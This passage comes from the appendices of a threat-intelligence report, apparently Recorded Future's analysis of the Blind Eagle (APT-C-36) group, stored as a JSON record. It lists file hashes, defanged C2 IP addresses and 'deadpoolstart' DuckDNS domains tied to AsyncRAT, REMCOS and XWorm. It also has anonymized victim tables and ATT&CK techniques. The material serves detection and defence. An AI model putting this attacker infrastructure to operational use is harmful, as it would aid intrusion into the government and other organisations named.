d41678f5dcf883a744c19083458f81ab3876ec71dadb1f81443728a38be3709e\r\nd8119df3e735dba78bc6c528f2737d8acb2e87f442596c810afcb5fa85261ad5\r\nd87c126baec640657fed03c6f493c2ad36b5e0f0483149b952e18688ab422276\r\nd8e3821ebb6a4af82f51591ab4a222add7163e2b8d33a642e1ca97bf06aced45\r\ndaa19bc1bbf65c80278076621afb8764b5d258d4b3a7280f6455dde812bc24c3\r\ndb3f21ef54324633b2102bcc127289348fe777382fe5dcb4380eafdfc506fe7b\r\nde162fdd0926b15a321150307806d4597e71395548b572e83bda5cc378743fe0\r\ndf0fe5536a69848a22b1b22f424a9bd598adafb30e09101dc98b214e09a1aef2\r\ndff4319ada078e744497da2f44a594228f2dde3761a0c80ebd5df43e7cc41b85\r\ne006c255d66a4eba50c26fffddda6f415d1
65a16eff5658413312d05c5f50173\r\ne3e14c713fd8e72e3e37d3e9b2cea2ed7bf70621c7c04263ed7ac6925d817086\r\ne4a3a4a5f88e181089d783f56aec7d2fc2f4647ac12b5de03746f81921097063\r\ne62966578720b4ab47866fbfc00011b72aa2c557fa95f159c42473d5c71261e8\r\ne6e1b9b41e158bbcbc893681e66d90ddc08f3fe7de1f5ba45eb53d4a2577db79\r\ne779571e4f80664738634254eccbf6f32bd51ff64ac4f0080ff43634fe723edb\r\neb3acf4a55cceb591712b83074568acee909a60669054dbeb5f0c0bc464a9ab0\r\nebd0127b3dfdc0dcf24f4a0a269769835d17a8e685193792082b359b843412ff\r\nebed364d453d5109b48ad9e4a12a887b8abc6a738b5030f2ca87d29a4a3b1f87\r\necb0ce4f96a59bf9978986f80709c80090d449ff7605f983e6cf708188600144\r\n \r\n38  CTA-2025-0826  Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\ned475a5fe53c368a1899fac98a6b88ec863f89ea07b7e571e6f0ec8b060262af\r\nee1a3803936b0f51c8fa1e2ce1fcbfe092f0c2e846d5fd5bb075f3ad931efe6f\r\nee966ef554884cc383b2bd03f39786af388a6712bf9e6facbe466faa1fef0251\r\nf057cf513f34fa8e036010389ab288207810fc14d1230a40f51d9abb2344f1c8\r\nf13be087d76de879d7d05da89aa14df3548b11138ef8943b2d9d11c9dd627133\r\nf1b9bad3c87e18d9abc585e17ccb2f0e3a266006eac12a2a3e1bc180d2f8a435\r\nf3fb0a6c6b3ba744cc8122148efd2943c8602facce97356a4008d67485afb55e\r\nf6caac63455aac9593976bac3fbf28378b89bd00a79fff2fd2563e24adf81ace\r\nf700b67bcdb5539105795c84ff283ccf4140f12a58b82501ad38ad29dc7e9c39\r\nf769521b8f831a9c7a1631dd9633e74cca1c39305ec995a4dbf8a77302ec2948\r\nf95dac0cdd08d1f5fa2e5032cc7a95a87044201c8601198b3860e501098d6549\r\nfa5a9e5bef372869f08e24ecfe8e68b12523f1a02607cd12d5f7f219b7dff8d1\r\nfb66632cd45196cc46dd75ffb02537e72772d6998f39743969bbaa1852362592\r\nfc4b79823478e62b18a49f18d70bbaf768e89e498d64b4c200ee873b1fe6554d\r\nfd665e99f65e34317e5b29b8b7761415317c5831bb91d843a76d477b6df19f15\r\nfd755425f8805b90b8c82ffa9e2d04d274811b7508b08a187b2a41148ad92a9a\r\nfd7a64d15e03608dceb95bc0912b39f9b94327b7ba8e6c989aa29205c3819184\r\nfe08793903f42d16cbac8a5b766d403a7c2f48e85672782e96197387adc4ec61\r\nfe92d0f395ec3d9a658bb337
2318a9ddee1a7819f82ffcdf2cc98044d2a70f3b\r\n \r\nPossibly Compromised Network Devices:\r\n8[.]242[.]185[.]28\r\n38[.]10[.]181[.]2\r\n38[.]51[.]232[.]73\r\n38[.]51[.]243[.]33\r\n38[.]52[.]156[.]157\r\n38[.]52[.]157[.]13\r\n38[.]191[.]200[.]22\r\n38[.]191[.]211[.]165\r\n45[.]169[.]38[.]202\r\n45[.]173[.]12[.]108\r\n64[.]76[.]53[.]93\r\n138[.]0[.]90[.]150\r\n143[.]137[.]98[.]182\r\n143[.]137[.]99[.]214\r\n152[.]200[.]146[.]245\r\n152[.]203[.]33[.]47\r\n152[.]231[.]30[.]83\r\n161[.]10[.]134[.]110\r\n170[.]239[.]205[.]17\r\n177[.]253[.]232[.]42\r\n179[.]1[.]85[.]155\r\n179[.]32[.]41[.]81\r\n179[.]189[.]222[.]53\r\n181[.]33[.]141[.]47\r\n181[.]118[.]156[.]251\r\n181[.]204[.]42[.]51\r\n181[.]225[.]72[.]167\r\n181[.]233[.]154[.]8\r\n181[.]233[.]154[.]17\r\n181[.]236[.]232[.]212\r\n185[.]75[.]12[.]39\r\n186[.]121[.]70[.]159\r\n186[.]168[.]153[.]205\r\n186[.]190[.]231[.]215\r\n190[.]0[.]246[.]233\r\n190[.]14[.]253[.]207\r\n190[.]60[.]35[.]218\r\n190[.]60[.]55[.]14\r\n190[.]102[.]120[.]123\r\n \r\n39  CTA-2025-0826  Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\n190[.]121[.]144[.]10\r\n190[.]121[.]150[.]213\r\n201[.]182[.]249[.]194\r\n201[.]182[.]249[.]243\r\n201[.]184[.]74[.]141\r\n \r\n \r\n40  CTA-2025-0826  Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nAppendix C: Cluster 1 Victims\r\nSuspected Victim Sector C2 Server(s) First Seen Last Seen\r\nVictim 1 Government 146[.]70[.]137[.]90 2025-05-20 2025-05-23\r\n146[.]70[.]51[.]42 2025-05-30 2025-06-09\r\nVictim 2 Government 146[.]70[.]51[.]42 2025-05-20 2025-06-04\r\nVictim 3 Government 146[.]70[.]51[.]42 2025-05-20 2025-06-04\r\nVictim 4 Government 146[.]70[.]137[.]90 2025-05-20 2025-06-05\r\n146[.]70[.]83[.]218 2025-05-26 2025-05-26\r\nVictim 5 Government 146[.]70[.]137[.]90 2025-05-20 2025-06-05\r\n146[.]70[.]51[.]42 2025-05-20 2025-05-20\r\nVictim 6 Education 146[.]70[.]51[.]42 2025-05-27 2025-06-03\r\nVictim 7 Government 146[.]70[.]137[.]90 
2025-05-28 2025-06-05\r\nVictim 8 Government 146[.]70[.]137[.]90 2025-05-12 2025-06-09\r\nVictim 9 Government 146[.]70[.]137[.]90 2025-05-24 2025-06-06\r\nVictim 9 Government 193[.]56[.]253[.]66 2025-06-10 2025-06-10\r\nVictim 10 Government 146[.]70[.]137[.]90 2025-05-08 2025-05-30\r\nVictim 11 Government 146[.]70[.]137[.]90 2025-05-20 2025-06-09\r\nVictim 12 Healthcare 146[.]70[.]137[.]90 2025-04-30 2025-06-09\r\nVictim 12 Healthcare 193[.]56[.]253[.]66 2025-06-13 2025-06-13\r\nVictim 12 Healthcare 45[.]133[.]180[.]26 2025-05-06 2025-05-09\r\nVictim 13 Government 146[.]70[.]137[.]90 2025-05-28 2025-06-10\r\nVictim 14 Government 146[.]70[.]137[.]90 2025-06-06 2025-06-09\r\nVictim 15 Government 146[.]70[.]83[.]218 2025-05-28 2025-05-29\r\nVictim 16 Retail 146[.]70[.]83[.]218 2025-05-27 2025-05-30\r\nVictim 17 Transport 146[.]70[.]83[.]218 2025-05-26 2025-05-29\r\nVictim 18 Education 146[.]70[.]83[.]218 2025-05-29 2025-05-29\r\nVictim 19 Education 45[.]133[.]180[.]130 2025-03-19 2025-03-26\r\nVictim 19 Education 146[.]70[.]57[.]58 2025-04-02 2025-04-02\r\nVictim 19 Education 45[.]133[.]180[.]154 2025-03-31 2025-04-08\r\n \r\nAppendix D: Cluster 2 IP Addresses\r\nIP Address ASN Suspected Type Malware Families\r\n45[.]77[.]72[.]102 AS20473 Virtual Private Server AsyncRAT\r\n64[.]188[.]9[.]172 AS36352 Proxy Server AsyncRAT\r\n64[.]188[.]9[.]173 AS36352 Proxy Server AsyncRAT\r\n64[.]188[.]9[.]175 AS36352 Proxy Server AsyncRAT\r\n64[.]188[.]9[.]177 AS36352 Proxy Server AsyncRAT\r\n179[.]14[.]8[.]131 AS27831 Colombian ISP AsyncRAT\r\n181[.]131[.]217[.]63 AS13489 Colombian ISP AsyncRAT\r\n \r\nAppendix E: “deadpoolstart”-Themed Domains Linked to Cluster 2\r\nDomain IP Address First Seen Last Seen\r\ndeadpoolstart2024[.]con-ip[.]com 64[.]188[.]9[.]172 2024-08-23 2025-03-12\r\ndeadpoolstart2025[.]con-ip[.]com 64[.]188[.]9[.]172 2024-08-14 2025-07-21\r\ndeadpoolstart2025[.]duckdns[.]org 179[.]14[.]11[.]213 2024-12-13 2024-12-13\r\ndeadpoolstart2025[.]duckdns[.]org 192[.]169[.]69[.]26 2024-12-16 2025-05-20\r\ndeadpoolstart2026[.]con-ip[.]com 64[.]188[.]9[.]172 2024-08-14 2025-07-09\r\ndeadpoolstart2026[.]duckdns[.]org 179[.]14[.]11[.]213 2024-12-20 2024-12-20\r\ndeadpoolstart2026[.]duckdns[.]org 192[.]169[.]69[.]26 2025-01-25 2025-07-18\r\ndeadpoolstart2027[.]con-ip[.]com 64[.]188[.]9[.]172 2024-08-24 2025-07-14\r\ndeadpoolstart2027[.]duckdns[.]org 172[.]93[.]160[.]188 2024-11-07 2024-11-07\r\ndeadpoolstart2027[.]duckdns[.]org 192[.]169[.]69[.]26 2025-03-12 2025-03-12\r\ndeadpoolstart2028[.]con-ip[.]com 64[.]188[.]9[.]172 2024-08-29 2025-07-16\r\ndeadpoolstart2028[.]duckdns[.]org 172[.]93[.]160[.]188 2024-11-06 2024-11-07\r\ndeadpoolstart2029[.]con-ip[.]com 64[.]188[.]9[.]172 2024-09-22 2025-06-30\r\ndeadpoolstart2029[.]duckdns[.]org 192[.]169[.]69[.]26 2025-03-03 2025-03-12\r\ndeadpoolstart2030[.]con-ip[.]com 64[.]188[.]9[.]172 2024-09-25 2025-07-15\r\ndeadpoolstart2030[.]duckdns[.]org 172[.]93[.]160[.]188 2024-10-30 2024-10-30\r\ndeadpoolstart2030[.]duckdns[.]org 192[.]169[.]69[.]26 2025-03-03 2025-03-03\r\ndeadpoolstart2033[.]duckdns[.]org 191[.]88[.]249[.]175 2025-02-12 2025-02-12\r\ndeadpoolstart2034[.]duckdns[.]org 191[.]88[.]249[.]175 2025-03-27 2025-03-27\r\ndeadpoolstart2035[.]duckdns[.]org 179[.]14[.]11[.]213 2025-01-28 2025-01-28\r\ndeadpoolstart2035[.]duckdns[.]org 192[.]169[.]69[.]26 2025-01-31 2025-07-17\r\ndeadpoolstart2036[.]duckdns[.]org 179[.]14[.]11[.]213 2025-01-29 2025-02-03\r\ndeadpoolstart2036[.]duckdns[.]org 192[.]169[.]69[.]26 2025-02-03 2025-07-18\r\ndeadpoolstart2037[.]duckdns[.]org 179[.]14[.]11[.]213 2025-01-30 2025-02-03\r\ndeadpoolstart2037[.]duckdns[.]org 192[.]169[.]69[.]26 2025-02-03 2025-07-17\r\ndeadpoolstart2038[.]duckdns[.]org 192[.]169[.]69[.]26 2025-02-05 2025-02-05\r\ndeadpoolstart2041[.]duckdns[.]org 179[.]14[.]8[.]131 2025-06-09 2025-06-09\r\ndeadpoolstart2044[.]duckdns[.]org 192[.]169[.]69[.]26 2025-05-09 2025-05-09\r\ndeadpoolstart2044[.]duckdns[.]org 191[.]88[.]249[.]175 2025-03-12 2025-03-12\r\ndeadpoolstart2049[.]duckdns[.]org 179[.]14[.]8[.]131 2025-07-11 2025-07-11\r\ndeadpoolstart2049[.]duckdns[.]org 177[.]255[.]84[.]173 2025-04-12 2025-04-12\r\ndeadpoolstart2051[.]duckdns[.]org 192[.]169[.]69[.]26 2025-05-02 2025-07-18\r\ndeadpoolstart2051[.]duckdns[.]org 177[.]255[.]84[.]173 2025-04-29 2025-05-01\r\ndeadpoolstart2052[.]duckdns[.]org 179[.]14[.]8[.]131 2025-05-11 2025-05-11\r\ndeadpoolstart2053[.]duckdns[.]org 179[.]14[.]8[.]131 2025-05-11 2025-05-11\r\ndeadpoolstart2054[.]duckdns[.]org 179[.]14[.]8[.]131 2025-05-26 2025-05-26\r\ndeadpoolstart2059[.]duckdns[.]org 179[.]14[.]8[.]131 2025-05-23 2025-05-23\r\ndeadpoolstart2060[.]duckdns[.]org 192[.]169[.]69[.]26 2025-06-29 2025-07-21\r\ndeadpoolstart2061[.]duckdns[.]org 181[.]131[.]217[.]63 2025-06-17 2025-06-30\r\ndeadpoolstart2061[.]duckdns[.]org 192[.]169[.]69[.]26 2025-06-30 2025-07-17\r\ndeadpoolstart2063[.]duckdns[.]org 181[.]131[.]217[.]63 2025-06-29 2025-06-29\r\ndeadpoolstart2064[.]duckdns[.]org 181[.]131[.]217[.]63 2025-07-03 2025-07-04\r\ndeadpoolstart2065[.]duckdns[.]org 181[.]131[.]217[.]63 2025-07-04 2025-07-05\r\n \r\nAppendix F: Cluster 2 Victims\r\nSuspected Victim Sector C2 Server(s) First Seen Last Seen\r\nVictim 20 Government 64[.]188[.]9[.]173 2024-10-11 2024-10-22\r\nVictim 20 Government 64[.]188[.]9[.]177 2024-10-16 2024-10-16\r\nVictim 21 Transport 64[.]188[.]9[.]173 2024-10-11 2024-10-21\r\nVictim 22 Education 64[.]188[.]9[.]177 2024-10-16 2024-10-31\r\nVictim 23 Education 64[.]188[.]9[.]177 2024-10-19 2024-10-19\r\nVictim 24 Government 64[.]188[.]9[.]172 2024-10-01 2024-10-06\r\nVictim 25 Government / Defense 64[.]188[.]9[.]172 2024-10-11 2024-10-15\r\nVictim 26 Government 64[.]188[.]9[.]173 2024-10-24 2024-10-24\r\nVictim 27 Retail 64[.]188[.]9[.]177 2024-12-20 2024-12-20\r\nVictim 28 Oil 64[.]188[.]9[.]173 2024-10-11 2024-10-30\r\n \r\nAppendix G: Cluster 3 IP Addresses\r\nIP Address ASN Type Malware Families\r\n181[.]131[.]216[.]206 AS13489 Colombian ISP REMCOS RAT\r\n181[.]131[.]218[.]182 AS13489 Colombian ISP REMCOS RAT\r\n181[.]131[.]219[.]42 AS13489 Colombian ISP REMCOS RAT, AsyncRAT\r\n \r\nAppendix H: Cluster 4 IP Addresses\r\nIP Address ASN Suspected Type Malware Family\r\n45[.]135[.]232[.]38 AS198953 Virtual Private Server AsyncRAT\r\n46[.]246[.]82[.]9 AS42708 Virtual Private Server XWorm\r\n89[.]117[.]23[.]25 AS40021 Virtual Private Server REMCOS RAT\r\n178[.]73[.]218[.]8 AS42708 Virtual Private Server AsyncRAT\r\n181[.]235[.]3[.]0 AS3816 Colombian ISP AsyncRAT\r\n191[.]93[.]113[.]151 AS27831 Colombian ISP AsyncRAT\r\n \r\nAppendix I: Cluster 5 Domains\r\nDomain First Seen Last Seen Malware Families\r\n2seguro2025[.]duckdns[.]org 2025-04-01 2025-07-09 N/A\r\nansy10jun[.]duckdns[.]org 2025-06-21 2025-06-29 AsyncRAT\r\nansy1703[.]duckdns[.]org 2025-03-20 2025-06-14 AsyncRAT\r\nasegurar2octubre[.]duckdns[.]org 2025-03-12 2025-07-17 AsyncRAT\r\nasegurar3octubre[.]duckdns[.]org 2025-05-08 2025-07-18 AsyncRAT\r\nbb2023[.]duckdns[.]org 2025-06-13 2025-07-10 N/A\r\ndcabril[.]duckdns[.]org 2025-06-13 2025-07-19 N/A\r\ngotemburgoxm[.]duckdns[.]org 2025-05-07 2025-07-15 REMCOS RAT, XWorm\r\nromanovas[.]duckdns[.]org 2025-03-04 2025-06-19 LimeRAT\r\n \r\nAppendix J: Original SVG Attachment\r\n \r\nAppendix K: MITRE ATT\u0026CK Techniques\r\nTactic: Technique ATT\u0026CK Code\r\nCommand and Control: Application Layer Protocol: Web Protocols T1071.001\r\nCommand and Control: Encrypted Channel: Asymmetric Cryptography T1573.002\r\nCommand and Control: Encrypted Channel: Symmetric Cryptography T1573.001\r\nCommand and Control: Ingress Tool Transfer T1105\r\nDefense Evasion: Modify Registry T1112\r\nDiscovery: System Information Discovery T1082\r\nDiscovery: Query Registry T1012\r\nExecution: Command and Scripting Interpreter: PowerShell T1059.001\r\nInitial Access: Spearphishing Link T1566.002\r\nResource Development: Acquire Infrastructure: Domains T1583.001\r\nResource Development: Acquire Infrastructure: Virtual Private Server T1583.003\r\nResource Development: Acquire Infrastructure: Server T1583.004\r\nResource Development: Acquire Infrastructure: Malvertising T1583.008\r\nResource Development: Compromise Infrastructure: Server T1584.004\r\n \r\nRecorded Future reporting contains expressions of likelihood or probability consistent\r\nwith US Intelligence Community Directive (ICD) 203: Analytic Standards (published\r\nJanuary 2, 2015). Recorded Future reporting also uses confidence level standards\r\nemployed by the US Intelligence Community to assess the quality and quantity of the\r\nsource information supporting our analytic judgments.\r\n \r\nAbout Insikt Group®\r\nRecorded Future’s Insikt Group, the company’s threat research division, comprises\r\nanalysts and security researchers with deep government, law enforcement, military, and\r\nintelligence agency experience. Their mission is to produce intelligence that reduces risk\r\nfor customers, enables tangible outcomes, and prevents business disruption.\r\n \r\nAbout Recorded Future®\r\nRecorded Future is the world’s largest intelligence company. The Recorded Future\r\nIntelligence Operations Platform provides the most complete coverage across\r\nadversaries, infrastructure, and targets. By combining precise, AI-driven analytics with\r\nthe Intelligence Graph® populated by specialized threat data, Recorded Future enables\r\ncyber teams to see the complete picture, act with confidence, and get ahead of threats\r\nthat matter before they impact your business. Headquartered in Boston with offices\r\naround the world, Recorded Future works with more than 1,900 businesses and\r\ngovernment organizations across 80 countries.\r\nLearn more at recordedfuture.com",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"pdf"
	],
	"references": [
		"https://assets.recordedfuture.com/insikt-report-pdfs/2025/cta-2025-0826.pdf"
	],
	"report_names": [
		"cta-2025-0826.pdf"
	],
	"threat_actors": [
		{
			"id": "98b22fd7-bf1b-41a6-b51c-0e33a0ffd813",
			"created_at": "2022-10-25T15:50:23.688973Z",
			"updated_at": "2026-04-29T06:58:57.691272Z",
			"deleted_at": null,
			"main_name": "APT-C-36",
			"aliases": [
				"APT-C-36",
				"Blind Eagle",
				"TAG-144",
				"AguilaCiega",
				"APT-Q-98"
			],
			"source_name": "MITRE:APT-C-36",
			"tools": [
				"njRAT",
				"Imminent Monitor",
				"DCRAT",
				"PureCrypter",
				"Caminho",
				"Remcos",
				"AsyncRAT",
				"QuasarRAT",
				"HeartCrypt"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "be597b07-0cde-47bc-80c3-790a8df34af4",
			"created_at": "2022-10-25T16:07:23.407484Z",
			"updated_at": "2026-04-29T06:58:57.790051Z",
			"deleted_at": null,
			"main_name": "Blind Eagle",
			"aliases": [
				"APT-C-36",
				"APT-Q-98",
				"AguilaCiega",
				"G0099"
			],
			"source_name": "ETDA:Blind Eagle",
			"tools": [
				"AsyncRAT",
				"BitRAT",
				"Bladabindi",
				"BlotchyQuasar",
				"Imminent Monitor",
				"Imminent Monitor RAT",
				"Jorik",
				"LimeRAT",
				"Remcos",
				"RemcosRAT",
				"Remvio",
				"Socmer",
				"Warzone",
				"Warzone RAT",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "bd43391b-b835-4cb3-839a-d830aa1a3410",
			"created_at": "2023-01-06T13:46:38.925525Z",
			"updated_at": "2026-04-29T06:58:56.373654Z",
			"deleted_at": null,
			"main_name": "APT-C-36",
			"aliases": [
				"Blind Eagle"
			],
			"source_name": "MISPGALAXY:APT-C-36",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1777429251,
	"ts_updated_at": 1777450954,
	"ts_creation_date": 1756135088,
	"ts_modification_date": 1756135105,
	"files": {
		"pdf": "https://archive.orkl.eu/ddfb075f6b359d1ee826fda08c1afd1b8bce8d4f.pdf",
		"text": "https://archive.orkl.eu/ddfb075f6b359d1ee826fda08c1afd1b8bce8d4f.txt",
		"img": "https://archive.orkl.eu/ddfb075f6b359d1ee826fda08c1afd1b8bce8d4f.jpg"
	}
}